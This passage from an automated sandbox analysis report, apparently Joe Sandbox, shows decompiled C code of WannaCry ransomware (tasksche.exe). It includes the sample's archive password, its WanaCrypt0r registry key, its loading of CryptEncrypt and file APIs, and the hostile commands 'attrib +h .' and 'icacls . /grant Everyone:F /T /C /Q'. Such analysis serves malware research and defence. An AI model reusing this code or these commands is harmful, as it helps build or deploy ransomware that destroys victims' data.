                    						 *((intOrPtr*)( *((intOrPtr*)( *_t37 + 0x28)) + _t25))(_t25, 0, 0);
                    					}
                    					if( *(_t37 + 8) == 0) {
                    						L9:
                    						_t18 =  *((intOrPtr*)(_t37 + 4));
                    						if(_t18 != 0) {
                    							 *((intOrPtr*)(_t37 + 0x20))(_t18, 0, 0x8000,  *((intOrPtr*)(_t37 + 0x30)));
                    						}
                    						return HeapFree(GetProcessHeap(), 0, _t37);
                    					} else {
                    						_t35 = 0;
                    						if( *((intOrPtr*)(_t37 + 0xc)) <= 0) {
                    							L8:
                    							free( *(_t37 + 8));
                    							goto L9;
                    						} else {
                    							goto L5;
                    						}
                    						do {
                    							L5:
                    							_t23 =  *((intOrPtr*)( *(_t37 + 8) + _t35 * 4));
                    							if(_t23 != 0) {
                    								 *((intOrPtr*)(_t37 + 0x2c))(_t23,  *((intOrPtr*)(_t37 + 0x30)));
                    							}
                    							_t35 = _t35 + 1;
                    						} while (_t35 <  *((intOrPtr*)(_t37 + 0xc)));
                    						goto L8;
                    					}
                    				}
                    				return _t17;
                    			}

                    APIs
                    • free.MSVCRT(?,00402198,00000000,00000000,0040243C,00000000), ref: 00402A15
                    • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,0040243C,00000000), ref: 00402A36
                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00402185,00402198,004021A3,004021B2,00000000), ref: 00402A3D
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                    • Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                    • Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmp
                    • Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$FreeProcessfree
                    • String ID:
                    • API String ID: 3428986607-0
                    • Opcode ID: 67af2f346d87749f9cdb855264ac8d2816ecbe8db690f3f12af5f99a0e11ec4c
                    • Instruction ID: 6307eaad725422957632c7c85bafc458d1caddc7471a2505469f2591130cc2ff
                    • Opcode Fuzzy Hash: 67af2f346d87749f9cdb855264ac8d2816ecbe8db690f3f12af5f99a0e11ec4c
                    • Instruction Fuzzy Hash: C4010C72600A019FCB309FA5DE88967B7E9FF48321354483EF196A2591CB75F841CF58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 16%
                    			E004018B9(void* __ecx) {
                    				signed int _t10;
                    				signed int _t11;
                    				long* _t12;
                    				void* _t13;
                    				void* _t18;
                    
                    				_t18 = __ecx;
                    				_t10 =  *(__ecx + 8);
                    				if(_t10 != 0) {
                    					 *0x40f89c(_t10);
                    					 *(__ecx + 8) =  *(__ecx + 8) & 0x00000000;
                    				}
                    				_t11 =  *(_t18 + 0xc);
                    				if(_t11 != 0) {
                    					 *0x40f89c(_t11);
                    					 *(_t18 + 0xc) =  *(_t18 + 0xc) & 0x00000000;
                    				}
                    				_t12 =  *(_t18 + 4);
                    				if(_t12 != 0) {
                    					CryptReleaseContext(_t12, 0);
                    					 *(_t18 + 4) =  *(_t18 + 4) & 0x00000000;
                    				}
                    				_t13 = 1;
                    				return _t13;
                    			}

                    APIs
                    • CryptReleaseContext.ADVAPI32(?,00000000,?,004013DB,?,?,?,0040139D,?,?,00401366), ref: 004018EA
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                    • Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                    • Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmp
                    • Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID: ContextCryptRelease
                    • String ID:
                    • API String ID: 829835001-0
                    • Opcode ID: 5ecafc68ca33f8cfa3c4e9ed1ded46982a6db61dfcb788b9f393b121ae522fda
                    • Instruction ID: 2349b07d823645f04250185dd133334db1216db109592f97c32ed3e6f6040a2b
                    • Opcode Fuzzy Hash: 5ecafc68ca33f8cfa3c4e9ed1ded46982a6db61dfcb788b9f393b121ae522fda
                    • Instruction Fuzzy Hash: C7E0ED323147019BEB30AB65ED49B5373E8AF00762F04C83DB05AE6990CBB9E8448A58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0040170A() {
                    				void* _t3;
                    				_Unknown_base(*)()* _t11;
                    				struct HINSTANCE__* _t13;
                    				intOrPtr _t18;
                    				intOrPtr _t20;
                    				intOrPtr _t21;
                    				intOrPtr _t22;
                    				intOrPtr _t23;
                    				intOrPtr _t24;
                    				intOrPtr _t25;
                    
                    				if(E00401A45() == 0) {
                    					L11:
                    					return 0;
                    				}
                    				_t18 =  *0x40f878; // 0x0
                    				if(_t18 != 0) {
                    					L10:
                    					_t3 = 1;
                    					return _t3;
                    				}
                    				_t13 = LoadLibraryA("kernel32.dll");
                    				if(_t13 == 0) {
                    					goto L11;
                    				}
                    				 *0x40f878 = GetProcAddress(_t13, "CreateFileW");
                    				 *0x40f87c = GetProcAddress(_t13, "WriteFile");
                    				 *0x40f880 = GetProcAddress(_t13, "ReadFile");
                    				 *0x40f884 = GetProcAddress(_t13, "MoveFileW");
                    				 *0x40f888 = GetProcAddress(_t13, "MoveFileExW");
                    				 *0x40f88c = GetProcAddress(_t13, "DeleteFileW");
                    				_t11 = GetProcAddress(_t13, "CloseHandle");
                    				_t20 =  *0x40f878; // 0x0
                    				 *0x40f890 = _t11;
                    				if(_t20 == 0) {
                    					goto L11;
                    				}
                    				_t21 =  *0x40f87c; // 0x0
                    				if(_t21 == 0) {
                    					goto L11;
                    				}
                    				_t22 =  *0x40f880; // 0x0
                    				if(_t22 == 0) {
                    					goto L11;
                    				}
                    				_t23 =  *0x40f884; // 0x0
                    				if(_t23 == 0) {
                    					goto L11;
                    				}
                    				_t24 =  *0x40f888; // 0x0
                    				if(_t24 == 0) {
                    					goto L11;
                    				}
                    				_t25 =  *0x40f88c; // 0x0
                    				if(_t25 == 0 || _t11 == 0) {
                    					goto L11;
                    				} else {
                    					goto L10;
                    				}
                    			}

                    APIs
                      • Part of subcall function 00401A45: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00401711), ref: 00401A5A
                      • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,?,00401711), ref: 00401A77
                      • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptImportKey,?,?,?,00401711), ref: 00401A84
                      • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptDestroyKey,?,?,?,00401711), ref: 00401A91
                      • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptEncrypt,?,?,?,00401711), ref: 00401A9E
                      • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptDecrypt,?,?,?,00401711), ref: 00401AAB
                      • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptGenKey,?,?,?,00401711), ref: 00401AB8
                    • LoadLibraryA.KERNEL32(kernel32.dll), ref: 0040172C
                    • GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 00401749
                    • GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00401756
                    • GetProcAddress.KERNEL32(00000000,ReadFile), ref: 00401763
                    • GetProcAddress.KERNEL32(00000000,MoveFileW), ref: 00401770
                    • GetProcAddress.KERNEL32(00000000,MoveFileExW), ref: 0040177D
                    • GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 0040178A
                    • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00401797
                    Strings
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$LibraryLoad
                    • String ID: CloseHandle$CreateFileW$DeleteFileW$MoveFileExW$MoveFileW$ReadFile$WriteFile$kernel32.dll
                    • API String ID: 2238633743-1294736154
                    • Opcode ID: 39239a652de09aa7f9a0fc3aed99621d6525255b515761ed1c17c464bdaba5bf
                    • Instruction ID: c344c10c919c95db3ecd10b94979b50738023765c799e55a58251b06a1d00095
                    • Opcode Fuzzy Hash: 39239a652de09aa7f9a0fc3aed99621d6525255b515761ed1c17c464bdaba5bf
                    • Instruction Fuzzy Hash: D9118E729003059ACB30BF73AE84A577AF8A644751B64483FE501B3EF0D77894499E1E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00401A45() {
                    				void* _t1;
                    				_Unknown_base(*)()* _t9;
                    				struct HINSTANCE__* _t11;
                    				intOrPtr _t15;
                    				intOrPtr _t17;
                    				intOrPtr _t18;
                    				intOrPtr _t19;
                    				intOrPtr _t20;
                    				intOrPtr _t21;
                    
                    				_t15 =  *0x40f894; // 0x0
                    				if(_t15 != 0) {
                    					L8:
                    					_t1 = 1;
                    					return _t1;
                    				}
                    				_t11 = LoadLibraryA("advapi32.dll");
                    				if(_t11 == 0) {
                    					L9:
                    					return 0;
                    				}
                    				 *0x40f894 = GetProcAddress(_t11, "CryptAcquireContextA");
                    				 *0x40f898 = GetProcAddress(_t11, "CryptImportKey");
                    				 *0x40f89c = GetProcAddress(_t11, "CryptDestroyKey");
                    				 *0x40f8a0 = GetProcAddress(_t11, "CryptEncrypt");
                    				 *0x40f8a4 = GetProcAddress(_t11, "CryptDecrypt");
                    				_t9 = GetProcAddress(_t11, "CryptGenKey");
                    				_t17 =  *0x40f894; // 0x0
                    				 *0x40f8a8 = _t9;
                    				if(_t17 == 0) {
                    					goto L9;
                    				}
                    				_t18 =  *0x40f898; // 0x0
                    				if(_t18 == 0) {
                    					goto L9;
                    				}
                    				_t19 =  *0x40f89c; // 0x0
                    				if(_t19 == 0) {
                    					goto L9;
                    				}
                    				_t20 =  *0x40f8a0; // 0x0
                    				if(_t20 == 0) {
                    					goto L9;
                    				}
                    				_t21 =  *0x40f8a4; // 0x0
                    				if(_t21 == 0 || _t9 == 0) {
                    					goto L9;
                    				} else {
                    					goto L8;
                    				}
                    			}

                    APIs
                    • LoadLibraryA.KERNEL32(advapi32.dll,?,?,00401711), ref: 00401A5A
                    • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,?,00401711), ref: 00401A77
                    • GetProcAddress.KERNEL32(00000000,CryptImportKey,?,?,?,00401711), ref: 00401A84
                    • GetProcAddress.KERNEL32(00000000,CryptDestroyKey,?,?,?,00401711), ref: 00401A91
                    • GetProcAddress.KERNEL32(00000000,CryptEncrypt,?,?,?,00401711), ref: 00401A9E
                    • GetProcAddress.KERNEL32(00000000,CryptDecrypt,?,?,?,00401711), ref: 00401AAB
                    • GetProcAddress.KERNEL32(00000000,CryptGenKey,?,?,?,00401711), ref: 00401AB8
                    Strings
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$LibraryLoad
                    • String ID: CryptAcquireContextA$CryptDecrypt$CryptDestroyKey$CryptEncrypt$CryptGenKey$CryptImportKey$advapi32.dll
                    • API String ID: 2238633743-2459060434
                    • Opcode ID: b9d8274d123a30a539352919ce36730ce9328d7041a45cd95e79278e35d60e58
                    • Instruction ID: 9aae3444cc52ced5e7e1ad1d2a06d11cf911cb2b3a933a05a08c6ba10b936042
                    • Opcode Fuzzy Hash: b9d8274d123a30a539352919ce36730ce9328d7041a45cd95e79278e35d60e58
                    • Instruction Fuzzy Hash: 20011E32A86311EBDB30AFA5AE856677AE4EA41750368843FB104B2DB1D7F81448DE5C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 88%
                    			E00407136(intOrPtr* __ecx, void* __edx, void* _a4, char _a7, char* _a8, char _a11, signed int _a12, intOrPtr _a16) {
                    				long _v8;
                    				char _v267;
                    				char _v268;
                    				struct _FILETIME _v284;
                    				struct _FILETIME _v292;
                    				struct _FILETIME _v300;
                    				long _v304;
                    				char _v568;
                    				char _v828;
                    				intOrPtr _t78;
                    				intOrPtr _t89;
                    				intOrPtr _t91;
                    				intOrPtr _t96;
                    				intOrPtr _t97;
                    				char _t100;
                    				void* _t112;
                    				void* _t113;
                    				int _t124;
                    				long _t131;
                    				intOrPtr _t136;
                    				char* _t137;
                    				char* _t144;
                    				void* _t148;
                    				char* _t150;
                    				void* _t154;
                    				signed int _t155;
                    				long _t156;
                    				void* _t157;
                    				char* _t158;
                    				long _t159;
                    				intOrPtr* _t161;
                    				long _t162;
                    				void* _t163;
                    				void* _t164;
                    
                    				_t154 = __edx;
                    				_t139 = __ecx;
                    				_t136 = _a16;
                    				_t161 = __ecx;
                    				if(_t136 == 3) {
                    					_t78 =  *((intOrPtr*)(__ecx + 4));
                    					_t155 = _a4;
                    					__eflags = _t155 - _t78;
                    					if(_t155 == _t78) {
                    						L14:
                    						_t156 = E00406880(_t139,  *_t161, _a8, _a12,  &_a7);
                    						__eflags = _t156;
                    						if(_t156 <= 0) {
                    							E00406A97( *_t161);
                    							_t14 = _t161 + 4;
                    							 *_t14 =  *(_t161 + 4) | 0xffffffff;
                    							__eflags =  *_t14;
                    						}
                    						__eflags = _a7;
                    						if(_a7 == 0) {
                    							__eflags = _t156;
                    							if(_t156 <= 0) {
                    								__eflags = _t156 - 0xffffff96;
                    								return ((0 | _t156 != 0xffffff96) - 0x00000001 & 0xfb001000) + 0x5000000;
                    							}
                    							return 0x600;
                    						} else {
                    							L17:
                    							return 0;
                    						}
                    					}
                    					__eflags = _t78 - 0xffffffff;
                    					if(_t78 != 0xffffffff) {
                    						E00406A97( *__ecx);
                    						_pop(_t139);
                    					}
                    					_t89 =  *_t161;
                    					 *(_t161 + 4) =  *(_t161 + 4) | 0xffffffff;
                    					__eflags = _t155 -  *((intOrPtr*)(_t89 + 4));
                    					if(_t155 >=  *((intOrPtr*)(_t89 + 4))) {
                    						L3:
                    						return 0x10000;
                    					} else {
                    						__eflags = _t155 -  *((intOrPtr*)(_t89 + 0x10));
                    						if(_t155 >=  *((intOrPtr*)(_t89 + 0x10))) {
                    							L11:
                    							_t91 =  *_t161;
                    							__eflags =  *((intOrPtr*)(_t91 + 0x10)) - _t155;
                    							if( *((intOrPtr*)(_t91 + 0x10)) >= _t155) {
                    								E0040671D(_t154,  *_t161,  *((intOrPtr*)(_t161 + 0x138)));
                    								 *(_t161 + 4) = _t155;
                    								_pop(_t139);
                    								goto L14;
                    							}
                    							E00406520(_t91);
                    							L10:
                    							goto L11;
                    						}
                    						E004064E2(_t139, _t89);
                    						goto L10;
                    					}
                    				}
                    				if(_t136 == 2 || _t136 == 1) {
                    					__eflags =  *(_t161 + 4) - 0xffffffff;
                    					if( *(_t161 + 4) != 0xffffffff) {
                    						E00406A97( *_t161);
                    						_pop(_t139);
                    					}
                    					_t96 =  *_t161;
                    					_t157 = _a4;
                    					 *(_t161 + 4) =  *(_t161 + 4) | 0xffffffff;
                    					__eflags = _t157 -  *((intOrPtr*)(_t96 + 4));
                    					if(_t157 >=  *((intOrPtr*)(_t96 + 4))) {
                    						goto L3;
                    					} else {
                    						__eflags = _t157 -  *((intOrPtr*)(_t96 + 0x10));
                    						if(_t157 >=  *((intOrPtr*)(_t96 + 0x10))) {
                    							L27:
                    							_t97 =  *_t161;
                    							__eflags =  *((intOrPtr*)(_t97 + 0x10)) - _t157;
                    							if( *((intOrPtr*)(_t97 + 0x10)) >= _t157) {
                    								E00406C40(_t161, _t154, _t157,  &_v568);
                    								__eflags = _v304 & 0x00000010;
                    								if((_v304 & 0x00000010) == 0) {
                    									__eflags = _t136 - 1;
                    									if(_t136 != 1) {
                    										_t158 = _a8;
                    										_t137 = _t158;
                    										_t144 = _t158;
                    										_t100 =  *_t158;
                    										while(1) {
                    											__eflags = _t100;
                    											if(_t100 == 0) {
                    												break;
                    											}
                    											__eflags = _t100 - 0x2f;
                    											if(_t100 == 0x2f) {
                    												L44:
                    												_t137 =  &(_t144[1]);
                    												L45:
                    												_t100 = _t144[1];
                    												_t144 =  &(_t144[1]);
                    												continue;
                    											}
                    											__eflags = _t100 - 0x5c;
                    											if(_t100 != 0x5c) {
                    												goto L45;
                    											}
                    											goto L44;
                    										}
                    										strcpy( &_v268, _t158);
                    										__eflags = _t137 - _t158;
                    										if(_t137 != _t158) {
                    											 *(_t163 + _t137 - _t158 - 0x108) =  *(_t163 + _t137 - _t158 - 0x108) & 0x00000000;
                    											__eflags = _v268 - 0x2f;
                    											if(_v268 == 0x2f) {
                    												L56:
                    												wsprintfA( &_v828, "%s%s",  &_v268, _t137);
                    												E00407070(0,  &_v268);
                    												_t164 = _t164 + 0x18;
                    												L49:
                    												__eflags = 0;
                    												_t112 = CreateFileA( &_v828, 0x40000000, 0, 0, 2, _v304, 0);
                    												L50:
                    												__eflags = _t112 - 0xffffffff;
                    												_a4 = _t112;
                    												if(_t112 != 0xffffffff) {
                    													_t113 = E0040671D(_t154,  *_t161,  *((intOrPtr*)(_t161 + 0x138)));
                    													__eflags =  *(_t161 + 0x13c);
                    													_pop(_t148);
                    													if( *(_t161 + 0x13c) == 0) {
                    														L00407700();
                    														_t148 = 0x4000;
                    														 *(_t161 + 0x13c) = _t113;
                    													}
                    													_t60 =  &_a12;
                    													 *_t60 = _a12 & 0x00000000;
                    													__eflags =  *_t60;
                    													while(1) {
                    														_t159 = E00406880(_t148,  *_t161,  *(_t161 + 0x13c), 0x4000,  &_a11);
                    														_t164 = _t164 + 0x10;
                    														__eflags = _t159 - 0xffffff96;
                    														if(_t159 == 0xffffff96) {
                    															break;
                    														}
                    														__eflags = _t159;
                    														if(__eflags < 0) {
                    															L68:
                    															_a12 = 0x5000000;
                    															L71:
                    															__eflags = _a16 - 1;
                    															if(_a16 != 1) {
                    																CloseHandle(_a4);
                    															}
                    															E00406A97( *_t161);
                    															return _a12;
                    														}
                    														if(__eflags <= 0) {
                    															L64:
                    															__eflags = _a11;
                    															if(_a11 != 0) {
                    																SetFileTime(_a4,  &_v292,  &_v300,  &_v284);
                    																goto L71;
                    															}
                    															__eflags = _t159;
                    															if(_t159 == 0) {
                    																goto L68;
                    															}
                    															continue;
                    														}
                    														_t124 = WriteFile(_a4,  *(_t161 + 0x13c), _t159,  &_v8, 0);
                    														__eflags = _t124;
                    														if(_t124 == 0) {
                    															_a12 = 0x400;
                    															goto L71;
                    														}
                    														goto L64;
                    													}
                    													_a12 = 0x1000;
                    													goto L71;
                    												}
                    												return 0x200;
                    											}
                    											__eflags = _v268 - 0x5c;
                    											if(_v268 == 0x5c) {
                    												goto L56;
                    											}
                    											__eflags = _v268;
                    											if(_v268 == 0) {
                    												L48:
                    												_t160 = _t161 + 0x140;
                    												wsprintfA( &_v828, "%s%s%s", _t161 + 0x140,  &_v268, _t137);
                    												E00407070(_t160,  &_v268);
                    												_t164 = _t164 + 0x1c;
                    												goto L49;
                    											}
                    											__eflags = _v267 - 0x3a;
                    											if(_v267 != 0x3a) {
                    												goto L48;
                    											}
                    											goto L56;
                    										}
                    										_t37 =  &_v268;
                    										 *_t37 = _v268 & 0x00000000;
                    										__eflags =  *_t37;
                    										goto L48;
                    									}
                    									_t112 = _a8;
                    									goto L50;
                    								}
                    								__eflags = _t136 - 1;
                    								if(_t136 == 1) {
                    									goto L17;
                    								}
                    								_t150 = _a8;
                    								_t131 =  *_t150;
                    								__eflags = _t131 - 0x2f;
                    								if(_t131 == 0x2f) {
                    									L35:
                    									_push(_t150);
                    									_push(0);
                    									L37:
                    									E00407070();
                    									goto L17;
                    								}
                    								__eflags = _t131 - 0x5c;
                    								if(_t131 == 0x5c) {
                    									goto L35;
                    								}
                    								__eflags = _t131;
                    								if(_t131 == 0) {
                    									L36:
                    									_t162 = _t161 + 0x140;
                    									__eflags = _t162;
                    									_push(_t150);
                    									_push(_t162);
                    									goto L37;
                    								}
                    								__eflags = _t150[1] - 0x3a;
                    								if(_t150[1] != 0x3a) {
                    									goto L36;
                    								}
                    								goto L35;
                    							}
                    							E00406520(_t97);
                    							L26:
                    							goto L27;
                    						}
                    						E004064E2(_t139, _t96);
                    						goto L26;
                    					}
                    				} else {
                    					goto L3;
                    				}
                    			}
                    0x00407375
                    0x004072da
                    0x004072da
                    0x004072da
                    0x00000000
                    0x004072da
                    0x004072a1
                    0x00000000
                    0x004072a1
                    0x00407263
                    0x00407266
                    0x00000000
                    0x00000000
                    0x0040726c
                    0x0040726f
                    0x00407271
                    0x00407273
                    0x00407283
                    0x00407283
                    0x00407284
                    0x00407290
                    0x00407290
                    0x00000000
                    0x00407296
                    0x00407275
                    0x00407277
                    0x00000000
                    0x00000000
                    0x00407279
                    0x0040727b
                    0x00407288
                    0x00407288
                    0x00407288
                    0x0040728e
                    0x0040728f
                    0x00000000
                    0x0040728f
                    0x0040727d
                    0x00407281
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00407281
                    0x00407244
                    0x0040723b
                    0x00000000
                    0x0040723b
                    0x00407236
                    0x00000000
                    0x00407236
                    0x00000000
                    0x00000000
                    0x00000000

                    Strings
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: %s%s$%s%s%s$:$\
                    • API String ID: 0-1100577047
                    • Opcode ID: fa5f8851d26bf09fdef4e4f1c55e900ad1a47778409aa7a1c0108d1ccba85c9d
                    • Instruction ID: 622825bbce38b7500016b977d00db7372d85e5c8e1565b3adbba59f792ee02a2
                    • Opcode Fuzzy Hash: fa5f8851d26bf09fdef4e4f1c55e900ad1a47778409aa7a1c0108d1ccba85c9d
                    • Instruction Fuzzy Hash: 42A12A31C082049BDB319F14CC44BEA7BA9AB01314F2445BFF895B62D1D73DBA95CB5A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 77%
                    			E0040203B(intOrPtr* __eax, void* __edi) {
                    				void* _t25;
                    				intOrPtr* _t33;
                    				int _t42;
                    				CHAR* _t63;
                    				void* _t64;
                    				char** _t66;
                    
                    				__imp____p___argv();
                    				if(strcmp( *( *__eax + 4), "/i") != 0 || E00401B5F(_t42) == 0) {
                    					L4:
                    					if(strrchr(_t64 - 0x20c, 0x5c) != 0) {
                    						 *(strrchr(_t64 - 0x20c, 0x5c)) = _t42;
                    					}
                    					SetCurrentDirectoryA(_t64 - 0x20c);
                    					E004010FD(1);
                    					 *_t66 = "WNcry@2ol7";
                    					_push(_t42);
                    					L00401DAB();
                    					E00401E9E();
                    					E00401064("attrib +h .", _t42, _t42);
                    					E00401064("icacls . /grant Everyone:F /T /C /Q", _t42, _t42);
                    					_t25 = E0040170A();
                    					_t74 = _t25;
                    					if(_t25 != 0) {
                    						E004012FD(_t64 - 0x6e4, _t74);
                    						if(E00401437(_t64 - 0x6e4, _t42, _t42, _t42) != 0) {
                    							 *(_t64 - 4) = _t42;
                    							if(E004014A6(_t64 - 0x6e4, "t.wnry", _t64 - 4) != _t42 && E004021BD(_t31,  *(_t64 - 4)) != _t42) {
                    								_t33 = E00402924(_t32, "TaskStart");
                    								_t78 = _t33 - _t42;
                    								if(_t33 != _t42) {
                    									 *_t33(_t42, _t42);
                    								}
                    							}
                    						}
                    						E0040137A(_t64 - 0x6e4, _t78);
                    					}
                    					goto L13;
                    				} else {
                    					_t63 = "tasksche.exe";
                    					CopyFileA(_t64 - 0x20c, _t63, _t42);
                    					if(GetFileAttributesA(_t63) == 0xffffffff || E00401F5D(__edi) == 0) {
                    						goto L4;
                    					} else {
                    						L13:
                    						return 0;
                    					}
                    				}
                    			}

                    APIs
                    • __p___argv.MSVCRT(0040F538), ref: 00402040
                    • strcmp.MSVCRT(?), ref: 0040204B
                    • CopyFileA.KERNEL32(?,tasksche.exe), ref: 0040206F
                    • GetFileAttributesA.KERNEL32(tasksche.exe), ref: 00402076
                      • Part of subcall function 00401F5D: GetFullPathNameA.KERNEL32(tasksche.exe,00000208,?,00000000), ref: 00401F97
                    • strrchr.MSVCRT(?,0000005C,?,?,00000000), ref: 0040209D
                    • strrchr.MSVCRT(?,0000005C), ref: 004020AE
                    • SetCurrentDirectoryA.KERNEL32(?,00000000), ref: 004020BB
                      • Part of subcall function 00401B5F: MultiByteToWideChar.KERNEL32(00000000,00000000,0040F8AC,000000FF,?,00000063), ref: 00401BCA
                      • Part of subcall function 00401B5F: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00401BDD
                      • Part of subcall function 00401B5F: swprintf.MSVCRT(?,%s\ProgramData,?), ref: 00401C04
                      • Part of subcall function 00401B5F: GetFileAttributesW.KERNEL32(?), ref: 00401C10
                    Strings
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$AttributesDirectorystrrchr$ByteCharCopyCurrentFullMultiNamePathWideWindows__p___argvstrcmpswprintf
                    • String ID: TaskStart$attrib +h .$icacls . /grant Everyone:F /T /C /Q$t.wnry$tasksche.exe
                    • API String ID: 1074704982-2844324180
                    • Opcode ID: 89895d8f6934e01f58802458fd3b58e20f5d1862df0252ba7c7124bca42d23be
                    • Instruction ID: 0f1cc1f94130967d107883c1ee7151828ebb686b55f89e1ef1b9593e139f0a32
                    • Opcode Fuzzy Hash: 89895d8f6934e01f58802458fd3b58e20f5d1862df0252ba7c7124bca42d23be
                    • Instruction Fuzzy Hash: 25318172500319AEDB24B7B19E89E9F376C9F10319F20057FF645F65E2DE788D488A28
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 58%
                    			E004010FD(intOrPtr _a4) {
                    				signed int _v8;
                    				signed int _v12;
                    				int _v16;
                    				void _v196;
                    				long _v216;
                    				void _v735;
                    				char _v736;
                    				signed int _t44;
                    				void* _t46;
                    				signed int _t55;
                    				signed int _t56;
                    				char* _t72;
                    				void* _t77;
                    
                    				_t56 = 5;
                    				memcpy( &_v216, L"Software\\", _t56 << 2);
                    				_push(0x2d);
                    				_v736 = _v736 & 0;
                    				_v8 = _v8 & 0x00000000;
                    				memset( &_v735, memset( &_v196, 0, 0 << 2), 0x81 << 2);
                    				asm("stosw");
                    				asm("stosb");
                    				wcscat( &_v216, L"WanaCrypt0r");
                    				_v12 = _v12 & 0x00000000;
                    				_t72 = "wd";
                    				do {
                    					_push( &_v8);
                    					_push( &_v216);
                    					if(_v12 != 0) {
                    						_push(0x80000001);
                    					} else {
                    						_push(0x80000002);
                    					}
                    					RegCreateKeyW();
                    					if(_v8 != 0) {
                    						if(_a4 == 0) {
                    							_v16 = 0x207;
                    							_t44 = RegQueryValueExA(_v8, _t72, 0, 0,  &_v736,  &_v16);
                    							asm("sbb esi, esi");
                    							_t77 =  ~_t44 + 1;
                    							if(_t77 != 0) {
                    								SetCurrentDirectoryA( &_v736);
                    							}
                    						} else {
                    							GetCurrentDirectoryA(0x207,  &_v736);
                    							_t55 = RegSetValueExA(_v8, _t72, 0, 1,  &_v736, strlen( &_v736) + 1);
                    							asm("sbb esi, esi");
                    							_t77 =  ~_t55 + 1;
                    						}
                    						RegCloseKey(_v8);
                    						if(_t77 != 0) {
                    							_t46 = 1;
